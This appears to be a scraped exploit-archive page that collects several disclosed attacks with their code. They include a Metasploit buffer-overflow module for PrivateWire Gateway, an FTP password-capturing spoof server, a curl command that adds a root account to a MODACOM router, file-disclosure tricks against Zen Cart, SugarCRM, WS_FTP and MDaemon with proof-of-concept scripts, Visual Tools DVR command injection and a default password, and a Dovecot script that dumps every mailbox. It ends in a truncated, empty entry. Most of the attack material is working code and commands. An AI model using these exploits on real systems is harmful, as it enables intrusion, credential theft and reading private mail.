Michael Thumann/privatewire.pm.txt( na)

Michael Thumann/privatewire.pm.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

##

# This file is part of the Metasploit Framework and may be redistributed

# according to the licenses defined in the Authors field below. In the

# case of an unknown or missing license, this file defaults to the same

# license as the core Framework (dual GPLv2 and Artistic). The latest

# version of the Framework can always be obtained from metasploit.com.

##

 

##

# From the author:

# This file may only be distributed as part of the Metasploit Framework.

# Any other use needs a written permission from the author.

##

 

package Msf::Exploit::privatewire_gateway_win32;

use base "Msf::Exploit";

use strict;

use Pex::Text;

 

my $advanced = { };

 

my $info =

  {

  'Name'  => 'Private Wire Gateway Buffer Overflow (win32)',

  'Version'  => '$Rev$',

  'Authors' =>

    [

    'Michael Thumann  <mthumann[at]ernw.de>',

    ],

  'Arch'  => [ 'x86' ],

  'OS'    => [ 'win32' ],

  'Priv'  => 1,

 

  'UserOpts'  =>

    {

    'RHOST' => [1, 'ADDR', 'The target address'],

    'RPORT' => [1, 'PORT', 'The target port', 80],

    'PATH'  => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],

    },

 

  'Payload' =>

    {

    'Space'    => 8000,

    'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",

    'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500

    },

 

  'Description'  => Pex::Text::Freeform(qq{

        This exploits a buffer overflow in the ADMCREG.EXE used

        in the PrivateWire Online Registration Facility. .

}),

 

  'Refs'  =>

    [

    ['BID', '18647'],

    ],

 

  'DefaultTarget' => 4,

  'Targets' => [

    ['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL

    ['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL

    ['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL

    ['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL

    ['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL

    ['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL

    ['Debugging', 0x41414141], # Crash

    ],

 

  'Keys' => ['privatewire'],

 

  'DisclosureDate' => 'June 26 2006',

  };

 

sub new {

  my $class = shift;

  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

  return($self);

}

 

sub Exploit

{

  my $self = shift;

  my $target_host = $self->GetVar('RHOST');

  my $target_port = $self->GetVar('RPORT');

  my $target_idx  = $self->GetVar('TARGET');

  my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

  my $path        = $self->GetVar('PATH');

  my $path_offset = length($path)-8;

 

  my $target = $self->Targets->[$target_idx];

 

  my $pattern = Pex::Text::AlphaNumText(8192);

  my $jmp = # add 25 to ecx and jmp

    "\x6a\x19".

    "\x58".

    "\x01\xc1".

    "\xff\xe1";

  substr($pattern, 0, length($shellcode), $shellcode);

  substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));

  substr($pattern, 8160, length($jmp), $jmp);

 

  my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";

 

  $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));

 

  my $s = Msf::Socket::Tcp->new

    (

    'PeerAddr'  => $target_host,

    'PeerPort'  => $target_port,

    'LocalPort' => $self->GetVar('CPORT'),

    );

  if ($s->IsError) {

    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);

    return;

  }

 

  $s->Send($request);

  $s->Close();

  return;

}

 

1;

This Metasploit module exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility version 3.7.

ManicX/ftp-spoof.pl( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

# This is a simple tcp server that listens on port 21

# unless another is specified. 

# The possible uses of this are;

#  Ftp has no encryption for passwords and they are

#  sent in plain text under the right conditions.

#  Most ftp programs have a text file called <program-name>.ini

#  which will store the info like site-name, user-name, encrypted

#  password and account-name.  Instead of trying to decrypt the

#  password for each different application (ws_ftp etc)

#  do this. 

#    Edit the <program-name>.ini

#    Wherever there is a site-name change it to 127.0.0.1

#    Start your this perl scipt

#    Open your ftp program and click connect

 

# Most of this coding was already in the /perl/eg/ folder

# you can find the orginal version there ..

 

print "===========================\n";

print " Manicx local FTP spoofer\n";

print " www.infowar.co.uk/manicx/\n";

print "===========================\n";

 

($port) = @ARGV;

$port = 21 unless $port;    # Are port is 21 unless specified

 

$AF_INET = 2;

$SOCK_STREAM = 1;

 

$sockaddr = 'S n a4 x8';

 

($name, $aliases, $proto) = getprotobyname('tcp');

if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}

 

print "Port = $port\n";

 

$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");

 

select(NS); $| = 1; select(stdout);

 

socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";

bind(S,$this) || die "bind: $!";

listen(S,5) || die "connect: $!";

 

select(S); $| = 1; select(stdout);

 

print "Listening for connection..\n";

 

($addr = accept(NS,S)) || die $!;

 

print "Accept ok\n";

 

($af,$port,$inetaddr) = unpack($sockaddr,$addr);

@inetaddr = unpack('C4',$inetaddr);

 

print NS "220\n"; # We are ok for login (send username)

$user = <NS>;

print $user;

 

print NS "331\n"; # user ok send password

$pass = <NS>;

print $pass;

 

print NS "331\n"; # password ok send account

$acco = <NS>;

print $acco;

 

print NS "200\n"; # account ok send what you want.

 

$resp = <NS>;

print $resp;

 

print NS "451\n"; # bye bye baby

ftp-spoof.pl v0.01 - Local FTP server spoofer: Many FTP clients these days have a text file called (program-name).ini which will store the info like site-name, user-name, encrypted password and account-name. Instead of trying to decrypt the password for each different application (ws_ftp etc) do this: edit the (program-name).ini, wherever there is a site-name change it to 127.0.0.1, start this perl scipt, open your ftp program and click connect.

Alex Stanev/MODACOM URoad-5000 1450 Command Execution( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

      ================================================

     == Alex Stanev Security Advisory #4 @31.05.2011 ==

     ==            http://sec.stanev.org            ==

      ================================================

 

PRODUCT

     URoad-5000

 

VENDOR

     MODACOM [http://www.modacom.co.kr]

 

VERSIONS AFFECTED

     v1450

 

CLASS

     Remote command execution/Backdoor

 

PRODUCT DESCRIPTION

     URoad-5000 is integrated battery powered wireless router. It comes with only one external USB

     interface and no other hardware comm interfaces (such as ethernet). Based on RaLink SoC 3050.

     The USB port is used for connection with MW-U3050, which is USB WiMAX dongle.

     Linux inside.

     Often marketed as WiMAX 2 WiFi "converter".

 

THE PROBLEM

     The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP.

     1) Web administration interface can be accessed with standard user/password pair admin:admin

     This can be later changed, but there is another possible access pair - engineer:engineer

     and it can't be changed via the web interface.

     2) Some of the SDK standard scripts are left and their screens in the web interface are just

     HTML commented. This reveals the /goform/SystemCommand method.

 

EXPLOIT

     1) Remote add r00t user with password boza

          $curl --basic -u "engineer:engineer" \

            -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" \

            192.168.100.254/goform/SystemCommand

          $telnet 192.168.100.254

          Trying 192.168.100.254...

          Connected to 192.168.100.254.

          modacom login: r00t

          Password: boza

          BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)

          Enter 'help' for a list of built-in commands.

          #

 

ADDITIONAL INFO

     The flaw was presented on OpenFest 2010.

     Presentation:http://openfest.org/files/slides-2010/OpenFest2010_Reverse_engineering_Alex_Stanev.pdf [in bulgarian]

 

PATCH/WORKAROUND

     No workaround possible. Next version?

 

VENDOR STATUS

     NOT informed. Backdoor.

 

     =========================

    ==           EOF         ==

    ==http://sec.stanev.org ==

     =========================

MODACOM URoad-5000 version 1450 has a hard-coded backdoor account that allows for remote command execution.

indoushka/Kasseler CMS 2.0.5 Disclosure( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

========================================================================================                 

| # Title    : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability  

| # Author   : indoushka                                                              

| # email    : indoushka@hotmail.com                                                                                                                                                                   

| # Dork     : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.                                                                                                               

| # Tested on: windows SP2 Français V.(Pnx2 2.0)       

| # Bug      : Backup    

http://www.digzip.com/files/0YQG52WD/kasseler_cms_2.0.5_full.zip                                                               

======================      Exploit By indoushka       =================================

# Exploit  : 

 

1 - http://127.0.0.1/kasseler/backup.php

 

File size: 37.38 KB

Tables processed: 39

Rows processed: 37

 

2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql

 

in lig 645:668 col 1 you found the login information

 

INSERT INTO `kasseler_users` VALUES

(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),

(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);

 

3 - XSS :

 

http://127.0.0.1/index.php?online/<script>alert(213771818860)</script>

 

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================

Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)

all my friend :

His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)

Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4Rhttp://www.ilegalintrusion.net/foro/

www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N

------------------------------------------------------------------------------------------------------------------------

Kasseler CMS 2.0.5 suffers from backup disclosure vulnerabilities.

Bogdan Calin/Zen Cart File Disclosure( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

Usually, curl is used to connect and retrieve data from a remote URL

using the http protocol. However, curl supports a bunch of protocols.

One of these protocols is the file protocol. Using this protocol you can

read local files by using an URL likefile:///etc/passwd. Therefore, if

the user can control the URL passed to curl_exec, in some cases (if the

content is echoed back) he can read local files.

 

While testing our AcuSensor technology on different applications, I’ve

found a real-life example of a vulnerable application.  I’m talking

about Zen Cart.

 

Zen Cart is an open source online store management system. It is

PHP-based, using a MySQL database and HTML components. Support is

provided for several languages and currencies, and it is freely

available under the GNU General Public License.

 

Zen Cart contains a directory named extras where there are different

test scripts. One of these scripts is curltest.php. This script is used

for testing is the curl PHP library is installed and is working properly.

 

Source code:

 

  ... 

 

  $url = (isset($_GET['url'])) ? urldecode($_GET['url']) : $defaultURL;

 

  ...

 

  // Send CURL communication

  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);

  curl_setopt($ch, CURLOPT_VERBOSE, 0);

 

  ...

 

  $result = curl_exec($ch);

  $errtext = curl_error($ch);

  $errnum = curl_errno($ch);

  $commInfo = @curl_getinfo($ch);

  curl_close ($ch);

 

  ...

 

  if ($url != $defaultURL) echo $result . 'EOF';

 

  ...

 

 

As you can see above, the URL passed to the curl_setopt (CURLOPT_URL)

function and later used by curl_exec comes from user input ($_GET['url']).

 

Also, the file contents (saved in the $result) are echoed back to the

user. Therefore we can read the contents of any file from the remote

server by issuing an request like:

http://website/zen-cart/extras/curltest.php?url=file:///etc/passwd

 

The extras directory contains other test scripts. One of them, named

ipn_test_return.php, is not properly written and will display an error

message when called directly:

 

If you issue a request like

http://website/zen-cart/extras/ipn_test_return.php

you will receive the following error message:

 

<br />

<b>Fatal error</b>: require() [<a

href='function.require'>function.require</a>]: Failed opening required

‘includes/application_top.php’

(include_path=’.:/usr/share/php:/usr/share/pear’) in

<b>/var/www/bld/bld02/zen-cart/extras/ipn_test_return.php</b> on line

<b>14</b><br />

 

This error message reveals the local path, so now we know where the

application is installed. This could be useful to read the contents of

the configuration file (includes/configure.php). This file contains the

database credentials. If the Zen Cart database is not stored on the

local server, it’s possible to access the database remotely.

 

Also, even without thefile:// protocol, it’s possible to access hosts

behind the firewall by issuing requests like

 

http://website/zen-cart/extras/curltest.php?url=http://192.168.0.1 or

http://website/zen-cart/extras/curltest.php?url=http://192.168.1.1.

 

The vendor released a security alert after being notified by us. They

advise users to completely remove the extras directory as it’s not

required by Zen Cart and it was distributed only for troubleshooting.

 

The security alert can be found at:

http://www.zen-cart.com/forum/showthread.php?t=142784

 

 

--

Bogdan Calin - bogdan@acunetix.com

CTO

Acunetix Ltd. - http://www.acunetix.com

Acunetix Web Security Blog -http://www.acunetix.com/blog

Zen Cart suffers from a remote file disclosure vulnerability.

Roberto Suggi Liverani/sugarcrm-disclose.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

========================================================================

= SugarCRM Community Edition Local File Disclosure Vulnerability

=

= Vendor Website:

= http://www.sugarcrm.com

=

= Affected Version:

=   -- SugarCRM Community Edition 4.5.1

=   -- SugarCRM Community Edition 5.0.0

=

= Public disclosure on 29th April 2008

=

========================================================================

Available online at:

http://www.security-assessment.com/files/advisories/2008-04-29_SugarCRM_

local_file_disclosure.pdf

 

== Overview ==

SugarCRM Community Edition is vulnerable to local file contents

disclosure.

This vulnerability can be exploited by a malicious user to disclose

potentially sensitive information. The flaw is caused due to a lack of

input filtering in the SugarCRM RSS module, which can be exploited

to disclose the content of local files.

 

The RSS module allows SugarCRM users to add RSS feeds to their personal

RSS list. The application expects an URL value pointing to a valid RSS

feed.

However, the URL variable value is not properly sanitised and any URI

value can be entered instead. In this particular case, it was discovered

 that it is possible to enter a file path to any files on the local

 system hosting the SugarCRM application.

 

As a result SugarCRM does not display the new RSS feed in the list as it

 is not a valid RSS URL Feed. However, the application creates a local

file with the filename of the md5 hash of the URL entered. The file is

created in the directory cache/feeds . If the Apache web server is used,

the file is created with the user www-data containing read permission.

 

 

== Exploitation ==

 

An exploitation example in a LAMP (Linux, Apache, Mysql, PHP)

environment:

 

If an authenticated attacker enters a value of “/etc/passwd”

(without quotes) in the RSS URL field, the application will generate a

MD5 hash of the string containing the file path. In this case,

 the value  “/etc/passwd” is hashed to “c5068b7c2b1707f8939b283a2758a691

” (without quotes). The MD5 hash is then used as a filename with the

file contents of /etc/passwd. The file /etc/passwd can then be viewable

publicly at http://sugarwebsiteaddress/cache/feeds/c5068b7c2b1707f8939b2

83a2758a691 .

 

Exploitation of this flaw does not require authentication.

 

The URL variable is handled by the /modules/Feeds/Feed.php page.

The array variable $url is passed without filtering to the

xml_domit_rss_document function at the following line:

 

$rssdoc = new xml_domit_rss_document ($this->url, ‘cache/feeds/’, 3600);

 

The XML domit RSS plugin is then called and retrieves the file content

at the path given and then generate the MD5 hashed file in the

cache/feeds folder as instructed by the function in Feed.php .

 

 

== Solutions ==

 

Install the vendor supplied patches.

Patch 4.5.1j: http://www.sugarcrm.com/forums/showthread.php?t=31688

Patch 5.0.0c: http://www.sugarcrm.com/forums/showthread.php?t=32252

 

== Credit ==

 

Discovered and advised to SugarCRM

April 2008 by Roberto Suggi Liverani Craig of Security-Assessment.com

 

== Greetings ==

 

To all my SA colleagues and thanks to the great atmosphere in

Hack in the Bush!

It was inspirational...

 

 

== About Security-Assessment.com ==

 

Security-Assessment.com is Australasia's leading team of Information

Security consultants specialising in providing high quality Information

Security services to clients throughout the Asia Pacific region. Our

clients include some of the largest globally recognised companies in

areas such as finance, telecommunications, broadcasting, legal and

government. Our aim is to provide the very best independent advice and

a high level of technical expertise while creating long and lasting

professional relationships with our clients.

 

Security-Assessment.com is committed to security research and

development, and its team continues to identify and responsibly publish

vulnerabilities in public and private software vendor's products.

Members of the Security-Assessment.com R&D team are globally recognised

through their release of whitepapers and presentations related to new

security research.

 

Roberto Suggi Liverani

Security-Assessment.com

SugarCRM Community Edition versions 4.5.1 and 5.0.0 suffer from a local file disclosure vulnerability.

Luigi Auriemma/wsftp-disclose.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

#######################################################################

 

                             Luigi Auriemma

 

Application:  WS_FTP Server Manager

              http://www.wsftp.com

Versions:     WS_FTP Server <= 6.1.0.0

Platforms:    Windows

Bugs:         A] authorization bypassing in log visualization

              B] ASP source visualization

Exploitation: remote

Date:         06 Feb 2008

Author:       Luigi Auriemma

              e-mail: aluigi@autistici.org

              web:    aluigi.org

 

 

#######################################################################

 

 

1) Introduction

2) Bugs

3) The Code

4) Fix

 

 

#######################################################################

 

===============

1) Introduction

===============

 

 

WS_FTP Server Manager (aka WS_FTP WebService) is the web administration

interface of the IpSwitch WS_FTP server and runs by default on port 80.

 

 

#######################################################################

 

=======

2) Bugs

=======

 

-----------------------------------------------

A] authorization bypassing in log visualization

-----------------------------------------------

 

The FTPLogServer folder available in the WS_FTP WebService is used for

the visualization and the downloading of the log entries collected by

the Logger Server used for any logging operation of the IpSwitch

servers (like both WS_FTP and the same WebService).

 

Naturally for watching the logs is needed to know the administration

username and password but exists a vulnerability which allows anyone to

gain access to this function of the server.

 

It's enough to logout from the web server without being logged in and

after this operation is possible to use all the asp files located in

the FTPLogServer folder through a strange account name called

localhostnull.

The vulnerability has been confirmed from both LAN and Internet.

 

The authorization bypassing is possible only for the ASP files located

in this folder so the management of the FTP server is not touched by

the vulnerability.

 

 

---------------------------

B] ASP source visualization

---------------------------

 

The following small bug is reported here only for thoroughness and has

no impact.

By default it canNOT be defined a vulnerability because the webservice,

although possible due to its directories structure (in short the WS_FTP

stuff is all in the WSFTPSVR folder so the rest of the root path of the

web server can be used for anything else), can't be considered a

"classical" web server where using custom contents.

 

Anyway if on the web server are in use custom ASP files a person can

see their content simply adding a dot at the end of the URL like in the

following examples of some pre-existent script files without the need

of being logged in:

 

http://SERVER/WSFTPSVR/login.asp.

http://SERVER/WSFTPSVR/FTPLogServer/LogViewer.asp.

http://SERVER/WSFTPSVR/FTP/ViewCert.asp.

 

 

#######################################################################

 

===========

3) The Code

===========

 

 

The following are the URLs to use in sequence for watching the logs:

 

http://SERVER/WSFTPSVR/FTPLogServer/login.asp?action=logLogout

http://SERVER/WSFTPSVR/FTPLogServer/LogViewer.asp

 

 

#######################################################################

 

======

4) Fix

======

 

 

No fix

 

 

#######################################################################

 

 

---

Luigi Auriemma

http://aluigi.org

WS_FTP Server versions 6.1.0.0 and below and Ipswitch What's Up Gold version 11.03 suffer from source disclosure and authorization bypass vulnerabilities.

Kingcope/MDaemon Mailer Daemon 11.0.1 File Disclosure( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

MDaemon Mailer Daemon Version 11.0.1 (LATEST) Remote File Disclosure

Bug Found & Exploited by Kingcope

May 2010

 

The latest version at the time of this advisory is vulnerble to the attack.

It seems all files which the SYSTEM account can read can be accessed remotely,

even accessing files on SMB shares located in the local network might

be possible.

 

The caveat is that only human readable files can be read.

This bug is complex so let's break the attack down into it's different pieces.

 

Mailing list support in MDaemon

---

MDaemon support mailing list. When a mailing list is configured, people can

subscribe and use the mailing list commands which are sent to

MDaemon@<domainhere>.

The MDaemon Software stores configurations for mailing lists inside a

file with the grp extension

which is located in <MDaemonDir>(normally C:\MDaemon)\App so for

example in C:\MDaemon\App.

A mailing list group file can look like the following (only a snippet

of the file):

 

---snip---

# Mailing List file

#

; ListName = test@company.mail

; Private = N

; HideFromAddressBook = N

; AllowExpn = Y

; ListNameInSubject = Y

 

...

---snip---

 

 

grp file

--

Inside the grp file there is a setting for a welcome message which is

sent when a user subscribes to

a mailing list.

The field is named "WelcomeFile", for example this setting can be:

; WelcomeFile = C:\autoexec.bat

 

 

Directory traversal in SUBSCRIBE (and other commands, SUBSCRIBE is the

important for the attack)

--

When subscribing to a mailing list the user sends an E-Mail with a subject like:

SUBSCRIBE test-mailinglist@<domainhere>

 

In this case a grp file named test-mailinglist@domain.grp will be

searched for in C:\MDaemon\App\.

An attacker can now supply dot dot slashes here to point to a

different file as intended, for example:

 

SUBSCRIBE VVV@"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar

 

In this case the Mailer Daemon will look for the grp file in the

location C:\Users\Kcope\OpenShare\foobar.grp.

If the file exists MDaemon will use this file and send back a

confirmation E-Mail because of a mailing list subscription.

The attack does not depend on a mailing list being configured but on a

file which the user controls under a C: folder (which

he for example uploaded through SMB or FTP). So this is the only

migitation for the attack. I did not find a way to

discard the grp file extension added to the requested file, so it's

not possible to reuse sent mails by the attacker

for example.

 

 

Welcome message file and final attack

--

As seen before the grp file supports a welcome message file setting.

When the user responds to the malicious

subscription request sent by him (it's important to change the domain

name at this point to the correct one, because

MDaemon gets confused by the ../ domainname seen above when sending

the confirmation mail) he will gracefully receive

the requested file which was set in grp file back as an email

contained in a welcome E-Mail by MDaemon.

 

 

Exploit PoC

--

 

The following exploit will force the welcome file set in

c:/users/kcope/openshare/foobar.grp to be sent to the attacker

after confirming the subscription request.

 

---snip---

use IO::Socket::INET;

use MIME::Base64;

 

$|=1;

 

$sock = IO::Socket::INET->new(PeerAddr => 'localhost',

                              PeerPort => '25',

                              Proto    => 'tcp');

 

print $sock "EHLO you\r\n";

print $sock "MAIL FROM: <niko>\r\n";

print $sock "RCPT TO: <MDaemon\@company.mail>\r\n";

print $sock "DATA\r\n";

print $sock "Date: 23 Oct 81 11:22:33\r\n";

print $sock "From: <niko>\r\n";

print $sock "To: <MDaemon\@company.mail>\r\n";

print $sock "Subject: SUBSCRIBE

VVV\@\"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar\r\n";

print $sock "\r\n\r\ntest\r\n.\r\nQUIT\r\n";

print ".";

 

while(<$sock>) {

  print;

}

---snip---

 

Regards and Signed,

 

Kingcope

MDaemon Mailer Daemon version 11.0.1 suffers from a remote file disclosure vulnerability.

Andrea Fabrizi/Visual Tools DVR Command Injection / Password Disclosure( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

**************************************************************

Title: Visual Tools DVR multiple vulnerabilities

Version affected: VS Series <= 3.0.6.16, VX Series <= 4.2.19.2

Vendor: http://www.visual-tools.com/

Discovered By: Andrea Fabrizi

Email: andrea.fabrizi@gmail.com

Web: http://www.andreafabrizi.it

Status: unpatched

**************************************************************

 

Visual Tools develops, manufactures and commercializes video

surveillance and video observations systems under the global brand

name VideoSafe Technology or under other companies’ brand names.

 

The DVR systems are based on x86 Debian GNU Linux embedded (aka

emdebian) and the entire framework and software are written using

Python.

 

After a full reverse engineering of the firmware i discovered some

interesting vulnerabilities, that allow an unauthorized user to access

the DVR web interface and gain a root shell on the system. At the time

i write this advisory, all DVR products commercialized by Visual

Tools, based on this firmware, are vulnerable.

 

1]======== Administration password disclosure ========

The system expose an hidden cgi that disclose the

Operator/Supervisor/Administrator password if invoked during the first

ten minutes after system boot.

 

- http://DVR_ADDRESS/cgi-bin/util/passwords.py

 

Is possible to write a simple script that check the cgi, every five

minutes for example, waiting for the device reboot, that sooner or

later, will happen :)

 

2]======== Default Administration password ========

As the previous vulnerability, also in this case is possible to access

any DVR system, during the first ten minutes after system boot, using

an hard-coded password.

 

The default password is: elefante (valid for

Operator/Supervisor/Administrator account)

 

3]======== Log files disclosure ========

The system expose an hidden cgi that allow any unauthenticated user to

get the system log files. By default the script does not works,

because the zip file is generated into the cgi-bin directory.

But... taking advantage of a directory traversal vulnerability that

affect the same script, is possible to write the zip file into the

apache root directory, and download it directly via browser.

 

- http://DVR_ADDRESS/cgi-bin/util/ziplogs.py?filename=../../html/logs

- http://DVR_ADDRESS/logs.zip (the zip file generated)

 

Moreover, the file "service.log" contains the Session ID of the

authenticated user, that can be used to hijack an existing session.

 

4]======== recv_ip_filtering.py command injection ========

Is possible, for authenticated users, to exploit a command injection

vulnerability that affects the script

/cgi-bin/conf/recv_ip_filtering.py.

This script, used to add or remove ip addresses from the local

iptables, accept one parameter that contains a list of IPs separated

by space, so is not possible to execute directly a command that

contains a space char. A workaround can be done passing the command

through an http header (user-agent for example), and invoking the

corresponding environment variable.

 

This is a sample request:

#####################################

POST http://DVR_ADDRESS/cgi-bin/conf/recv_ip_filtering.py HTTP/1.1

User-Agent: [COMMAND]

Cookie: language=en; session=VALID_SESSION_ID; user=administrator;

current_page=main/400_Mconf/200_Mnetwork

Content-Type: application/x-www-form-urlencoded

Content-Length: 90

 

iplistFields=192.168.0.1+192.168.0.2%3b$HTTP_USER_AGENT%3b

#####################################

 

The command will be executed with the privilege of the apache user.

 

5]======== init_diskmgr insecure permissions ========

The script "/home/apache/DiskManager/cron/init_diskmgr", writable by

the apache user, is executed by crontab every 15 minutes, with root

privileges. So, editing the script and waiting the scheduled

execution, is possible to run command on the system with root

privileges.

 

By default the ssh access is denied because the /etc/shadow don't

contains the root password shadow, but exploiting this vulnerability

is possible to add it and gain ssh access to the system.

 

**************************************************************

TIME-LINE

 

- 21/09/2012: Vendor contact. No response.

- 15/10/2012: Disclosure.

**************************************************************

Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.

Kingcope/dovecot-disclose.txt( na)

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit

#Here's an exploit for the recent TAB vulnerability in Dovecot.

#It's nothing special since in the wild there are few to none

#targets because of the special option which has to be set.

#see CVE Entry CVE-2008-1218

#Exploit written by Kingcope

import sys

import imaplib

 

print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"

print "Prints out all E-Mails for any account if special configuration option is set"

print "Exploit written by kingcope\n"

 

if len(sys.argv)<3:

     print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0]

     exit(0);

 

if len(sys.argv)>3 and sys.argv[3] == "-nossl":

  M = imaplib.IMAP4(sys.argv[1])

else:

  M = imaplib.IMAP4_SSL(sys.argv[1])

M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");

M.select()

print "login succeeded."

typ, data = M.search(None, 'ALL')

k=0

for num in data[0].split():

    typ, data = M.fetch(num, '(RFC822)')

    print 'Message %s\n%s\n' % (num, data[0][1])

    k=k+1

M.close()

M.logout()

print "Messages read: %s" % k

Dovecot IMAP versions 1.0.10 through 1.1rc2 remote email disclosure exploit.

KinG-LioN/PHPFootball 1.6 Hash Disclosure( na)

?

1

2

3

4

5

6

7

8

9

